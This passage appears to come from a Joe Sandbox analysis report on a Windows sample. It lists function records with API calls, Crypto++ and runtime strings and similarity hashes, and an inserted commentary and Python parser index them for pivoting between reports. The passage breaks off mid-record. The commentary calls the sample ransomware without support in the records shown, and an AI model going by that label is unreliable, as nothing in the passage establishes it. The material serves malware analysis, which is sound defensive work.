                                      • String ID: 0123456789ABCDEFabcdef-+Xx
                                      • API String ID: 1853221402-2799312399
                                      • Opcode ID: b474cc87fd33b2233a434728835568e830c9392a0befb56b4892dde8bb0c4a62
                                      • Instruction ID: 4d43dafe5957ec37546f7774eca4c5f6735e8bd9f6b047f21599e846dc9e9ad7
                                      • Opcode Fuzzy Hash: b474cc87fd33b2233a434728835568e830c9392a0befb56b4892dde8bb0c4a62
                                      • Instruction Fuzzy Hash: 6DC17F30D092A89EDF11DFF8D450BECFBB6AF55300F184499E885BB24BDA249D45CB51
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 008FF7B2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: 0
                                      • API String ID: 2659868963-4108050209
                                      • Opcode ID: a13a3c5b2d967de2e4e559e3fb5d5afd102747df66ced6fe6394ff533f195d95
                                      • Instruction ID: af9a59ce6ffb3dcdedf54f26d3f87290ea9a1acdd836d6a920d4af4c46d0f09b
                                      • Opcode Fuzzy Hash: a13a3c5b2d967de2e4e559e3fb5d5afd102747df66ced6fe6394ff533f195d95
                                      • Instruction Fuzzy Hash: 3371B171D0064DDBDB10CFA9C841BAEFBB8FF59314F14822AE915E7241EB74AA458B90
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008FCD9D
                                      Strings
                                      • BlockPaddingScheme, xrefs: 008FCD2D
                                      • StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher, xrefs: 008FCD77
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: BlockPaddingScheme$StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher
                                      • API String ID: 2005118841-3582606076
                                      • Opcode ID: 568f3b30a8341327e021cdc48202bebbda8c00da65d90fbbf0b8e9fbc46833e6
                                      • Instruction ID: f7792187d272052e622d0667ee2321b02a842422dff08e019b62b5dcd3aa1c4a
                                      • Opcode Fuzzy Hash: 568f3b30a8341327e021cdc48202bebbda8c00da65d90fbbf0b8e9fbc46833e6
                                      • Instruction Fuzzy Hash: 6151AE70A01749AFDB15DF68C945BAEBBF4FF45304F10406AE911AB391D7B1AA08CB91
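Each of these records is the unit a practitioner pivots on: an Opcode ID, Instruction ID or API String ID shared between two reports points at the same function, and the embedded strings identify statically linked library code (the StreamTransformationFilter message in the record above is the exception text Crypto++ throws when that filter is handed an AuthenticatedSymmetricCipher, so the function it sits in is library code, not the ransomware author's own). The following Python is an added example, not Joe Sandbox's code and not part of the original report: it parses records in this page's layout into dicts and indexes them. SAMPLE is constructed from two records copied from this section (with the "Download File" link text that the web export glues onto the dump names left in, so the parser is seen stripping it); the field names apis, strings, dumps and meta and the helper names are this example's own.

```python
"""Parser for the Joe Sandbox per-function records shown on this page (the
"APIs / Strings / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity"
blocks). Added example, not Joe Sandbox code: SAMPLE is constructed from two
records copied off this section, and the field names are this example's own."""
import re

HEADERS = ("APIs", "Strings", "Memory Dump Source",
           "Joe Sandbox IDA Plugin", "Similarity")

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR"; the optional
# "Part of subcall function XXXX: " prefix marks a call one level down.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xref>[0-9A-F]+)$")

SAMPLE = """\
APIs
• SetThreadPriority.KERNEL32(?,?), ref: 0094325D
• GetLastError.KERNEL32 ref: 00943269
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0094327F
• __CxxThrowException@8.LIBVCRUNTIME ref: 0094328D
Memory Dump Source
• Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
• Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
Similarity
• String ID:
• API String ID: 4286982218-0
• Opcode ID: 346d73b79fe560e782e221c39044c79d6e288e3febaf801bbfe19028b1f5566a
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 008FCD9D
Strings
• BlockPaddingScheme, xrefs: 008FCD2D
• StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher, xrefs: 008FCD77
Memory Dump Source
• Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
Similarity
• API ID: Exception@8Throw
• String ID: BlockPaddingScheme$StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher
• API String ID: 2005118841-3582606076
• Opcode ID: 568f3b30a8341327e021cdc48202bebbda8c00da65d90fbbf0b8e9fbc46833e6
"""


def parse_records(text):
    """Split report text into one dict per function record."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            if line == "APIs":  # every record opens with an "APIs" header
                cur = {"apis": [], "strings": [], "dumps": [], "meta": {}}
                records.append(cur)
            section = line
            continue
        if not line or cur is None:
            continue
        body = line.lstrip("•").strip()
        if section == "APIs":
            if m := API_RE.match(body):
                cur["apis"].append(m.groupdict())
        elif section == "Strings":
            if m := STRING_RE.match(body):
                cur["strings"].append(m.groupdict())
        elif section == "Memory Dump Source":
            # The web export glues the "Download File" link text onto the name.
            name = body.partition(": ")[2].split(",")[0]
            cur["dumps"].append(name.removesuffix("Download File"))
        else:  # IDA Plugin and Similarity lines are "key: value"
            key, _, val = body.partition(":")
            cur["meta"][key.strip()] = val.strip()
    return records


def api_names(rec, include_subcalls=False):
    """Resolved API names in report order; subcall entries only on request."""
    return [a["name"] for a in rec["apis"] if include_subcalls or a["sub"] is None]


def index_by(records, key):
    """Map each distinct Similarity/IDA value (e.g. "Opcode ID") to the indices
    of the records carrying it; a value shared across reports is a pivot."""
    index = {}
    for i, rec in enumerate(records):
        if val := rec["meta"].get(key):
            index.setdefault(val, []).append(i)
    return index


def records_with_string(records, needle):
    """Indices of records whose embedded strings contain `needle`, e.g. a
    library's known exception text, to separate library code from author code."""
    return [i for i, rec in enumerate(records)
            if any(needle in s["text"] for s in rec["strings"])]


RECORDS = parse_records(SAMPLE)
```

index_by over the combined records of two reports, keyed on "Opcode ID" or "API String ID", lists the functions both samples contain; records_with_string narrows the set to functions carrying a library's known messages so they can be excluded before comparing what is left.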
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: H_prolog3_ctype
                                      • String ID: %.0Lf
                                      • API String ID: 2548254987-1402515088
                                      • Opcode ID: bdca90d2472b68b86272d1c2562df21149aad618eea61930f42cb77ca2f832f4
                                      • Instruction ID: 1f0ff5f74447d77728360d9991e8163e0ee753f8d9647f6274838796aec6f746
                                      • Opcode Fuzzy Hash: bdca90d2472b68b86272d1c2562df21149aad618eea61930f42cb77ca2f832f4
                                      • Instruction Fuzzy Hash: 1C4176B2D00208ABCF05EFD4D849BDEBBB9FB44300F108948F855AB295DB795959CF90
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: H_prolog3_ctype
                                      • String ID: %.0Lf
                                      • API String ID: 2548254987-1402515088
                                      • Opcode ID: 822166e5621f59eea3616b2328f2f8071788e4f7208021ab08d7814031b05ce5
                                      • Instruction ID: f2364720323e2806ff95831e5a5677eb7e23508743bf6e016e4d8fdc9fbc2e9f
                                      • Opcode Fuzzy Hash: 822166e5621f59eea3616b2328f2f8071788e4f7208021ab08d7814031b05ce5
                                      • Instruction Fuzzy Hash: 624187B2D04208ABCF05EFD8CC45BDEBBB9FB04300F104848E855AB2A6DB395919CF91
                                      APIs
                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0095B1AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: EncodePointer
                                      • String ID: MOC$RCC
                                      • API String ID: 2118026453-2084237596
                                      • Opcode ID: 0e2ad9ad0f529ceb7d1f3b2053d8e162d84bd39bf9d06b74820b7b1f5bbd4add
                                      • Instruction ID: cf5a90c86461f6426003bcd8ab6ce59521723eeadb8d7262c51d617b326c31bc
                                      • Opcode Fuzzy Hash: 0e2ad9ad0f529ceb7d1f3b2053d8e162d84bd39bf9d06b74820b7b1f5bbd4add
                                      • Instruction Fuzzy Hash: 43418831900209AFCF16CF99CC81AEEBBB9BF48301F188159FD18A7221D7359A54DF61
                                      APIs
                                      • __EH_prolog3_GS.LIBCMT ref: 00937235
                                        • Part of subcall function 0092BA2F: __EH_prolog3.LIBCMT ref: 0092BA36
                                        • Part of subcall function 0092BA2F: std::_Lockit::_Lockit.LIBCPMT ref: 0092BA40
                                        • Part of subcall function 0092BA2F: std::_Lockit::~_Lockit.LIBCPMT ref: 0092BAB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
                                      • String ID: %.0Lf$0123456789-
                                      • API String ID: 2728201062-3094241602
                                      • Opcode ID: dd590ee8c9f9db0d0a1e34082f40b7eb893f534ece80e819ed543bc3b8dd612c
                                      • Instruction ID: 40c9a8c37b578267a462f489ad0319baddfd57c02af8c8c3146cc9afd1f2a861
                                      • Opcode Fuzzy Hash: dd590ee8c9f9db0d0a1e34082f40b7eb893f534ece80e819ed543bc3b8dd612c
                                      • Instruction Fuzzy Hash: 9241797190021ADFCF15DFD8C881AEEBBB6FF98314F144059E810AB255DB30AA56CFA1
                                      APIs
                                      • __EH_prolog3_GS.LIBCMT ref: 009374D5
                                        • Part of subcall function 008ECC80: std::_Lockit::_Lockit.LIBCPMT ref: 008ECCCC
                                        • Part of subcall function 008ECC80: std::_Lockit::_Lockit.LIBCPMT ref: 008ECCEE
                                        • Part of subcall function 008ECC80: std::_Lockit::~_Lockit.LIBCPMT ref: 008ECD0E
                                        • Part of subcall function 008ECC80: std::_Lockit::~_Lockit.LIBCPMT ref: 008ECE0C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                      • String ID: 0123456789-$0123456789-
                                      • API String ID: 2088892359-2494171821
                                      • Opcode ID: 49a6937ba954cb0a17994cf48924dbfd69c9f3b208b4827211a865de107d53e7
                                      • Instruction ID: 6f77a45bc6d0c780a235cbac6ac75dfe1e9141917873d106140fad13b17c0cd7
                                      • Opcode Fuzzy Hash: 49a6937ba954cb0a17994cf48924dbfd69c9f3b208b4827211a865de107d53e7
                                      • Instruction Fuzzy Hash: 93414771A1021ADFCF19DF98C881AEEBBB6FF49314F144059E401AB255DB30AA56CFA1
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008FF34B
                                      Strings
                                      • InputBuffer, xrefs: 008FF2B1
                                      • StringStore: missing InputBuffer argument, xrefs: 008FF325
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: InputBuffer$StringStore: missing InputBuffer argument
                                      • API String ID: 2005118841-2380213735
                                      • Opcode ID: a664aa71c6ef722aad449da49a76b60ce2726a0da75bccdd006cf8b30d9c6272
                                      • Instruction ID: 00c0605b82f4c26ac03c200356c25eb8356197410a5bbe4ba74058f5e1ae733d
                                      • Opcode Fuzzy Hash: a664aa71c6ef722aad449da49a76b60ce2726a0da75bccdd006cf8b30d9c6272
                                      • Instruction Fuzzy Hash: 50315A71A04748DFDB10DFA8D854B9EBBF8FF89714F108169E415AB380DB74AA08CB90
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: __dosmaperr_free
                                      • String ID: SystemRoot
                                      • API String ID: 3116789124-2034820756
                                      • Opcode ID: 99cbd4f604e510aaf43efbc78a89017ee4a8d7533cf572568847b0e1f69e1b88
                                      • Instruction ID: 4ebfaad50ec713c8adc97b92fb217e8f9785578d7db66972cb0fa33e5f0db3a1
                                      • Opcode Fuzzy Hash: 99cbd4f604e510aaf43efbc78a89017ee4a8d7533cf572568847b0e1f69e1b88
                                      • Instruction Fuzzy Hash: 22213D326042119FEF19AF28C840B7977A9EFC6720F19815DF8459B342C6769D018750
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00918114
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: Resynchronize$key is set
                                      • API String ID: 2005118841-370131452
                                      • Opcode ID: 7374bf81227b27b84940f0121ef2bac115df314c8ccae89cdecd6adf502f88b1
                                      • Instruction ID: 45248d20e516410d6cc4d5fd073b5dbc68d49081425238efbb1f7f5260bcef38
                                      • Opcode Fuzzy Hash: 7374bf81227b27b84940f0121ef2bac115df314c8ccae89cdecd6adf502f88b1
                                      • Instruction Fuzzy Hash: 93314DB160460AAFDB00DF61C989B9BFBB9FB88314F404519E81597A80DBB5A428CF90
                                      APIs
                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0097EDC4,00000000,00000050,?,?,?,?,?), ref: 0097EC44
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ACP$OCP
                                      • API String ID: 0-711371036
                                      • Opcode ID: e04e89240a7d51dd4a259c1288c45467d367a3f78ffb16d16c5d2ecd00e312cb
                                      • Instruction ID: 311c0064de9fe4bd7789d881ef6dfbc758f86bba24ec621ce036573cd8d47ec1
                                      • Opcode Fuzzy Hash: e04e89240a7d51dd4a259c1288c45467d367a3f78ffb16d16c5d2ecd00e312cb
                                      • Instruction Fuzzy Hash: EE21B3A7A04204A6D7358A65C901BA777AEEB5CB25F5EC4E4F94ED7240F732DE40C390
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008B610E
                                        • Part of subcall function 00958621: RaiseException.KERNEL32(?,?,00925B8C,?,?,Dflt,?,?,?,?,?,00925B8C,?,009C9A70,?), ref: 00958681
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 008B6162
                                      Strings
                                      • Clone() is not implemented yet., xrefs: 008B60E5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ExceptionException@8RaiseThrow___std_exception_copy
                                      • String ID: Clone() is not implemented yet.
                                      • API String ID: 640887848-226299721
                                      • Opcode ID: 7457c8c4167c4bf56a942a7c02f173ea3042804c07415a01763e2cbbe200f64c
                                      • Instruction ID: 48519e7f6fa8021e53c1b2bfcc61002605dc1f18538568a52b267c8ebe0855b0
                                      • Opcode Fuzzy Hash: 7457c8c4167c4bf56a942a7c02f173ea3042804c07415a01763e2cbbe200f64c
                                      • Instruction Fuzzy Hash: 24217FB1914608ABC711DF59CC41F9AF7FCFB49714F10862AE811E3780EB74AA088BA0
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: H_prolog3___cftoe
                                      • String ID: !%x
                                      • API String ID: 855520168-1893981228
                                      • Opcode ID: 3791157bf6d603bef48383ec395dd17e71ee3190509adf2e7bbd379c94382800
                                      • Instruction ID: 15115e39ba555cdd3841def1bad4c453109fe9ffb7a6041bf82781175a052a8d
                                      • Opcode Fuzzy Hash: 3791157bf6d603bef48383ec395dd17e71ee3190509adf2e7bbd379c94382800
                                      • Instruction Fuzzy Hash: 5B214671D01209EBCF04EF94E892AEEB7B6FF48704F504418F905AB251EB75AA15CFA0
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: H_prolog3___cftoe
                                      • String ID: !%x
                                      • API String ID: 855520168-1893981228
                                      • Opcode ID: 692e044410a7a89c0484f969425e6a68f47b1ec5dbf04e563b2c6c105f1dfdbc
                                      • Instruction ID: dcaad2692d0b3fb438dfe9877b61a6ff937b0ecfd9972ceb2746b0869229d55e
                                      • Opcode Fuzzy Hash: 692e044410a7a89c0484f969425e6a68f47b1ec5dbf04e563b2c6c105f1dfdbc
                                      • Instruction Fuzzy Hash: 34214671D0120AEBCF00EF94D891AEEB7B6FF48304F114428F905AB251DB756A15CFA0
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 008B29AB
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 008B29FA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
